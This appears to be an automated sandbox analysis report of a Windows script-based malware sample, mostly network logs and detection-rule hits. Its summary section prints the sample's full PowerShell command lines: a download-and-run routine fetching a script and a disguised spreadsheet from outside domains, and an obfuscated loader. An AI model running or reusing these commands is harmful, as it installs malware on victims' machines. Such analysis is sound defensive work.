            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 209.124.66.28:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.113.195.132:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49836 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49840 version: TLS 1.2

            System Summary

            barindex
            Source: amsi32_6364.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 4352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Ree
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $ReeJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4AEAAB267_2_00007FFB4AEAAB26
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4AEAB8D27_2_00007FFB4AEAB8D2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4AF7DA1A7_2_00007FFB4AF7DA1A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0294E92010_2_0294E920
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0294F1F010_2_0294F1F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0294E5D810_2_0294E5D8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0693064710_2_06930647
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4343
            Source: unknownProcess created: Commandline size = 4343
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4343Jump to behavior
            Source: amsi32_6364.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 4352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
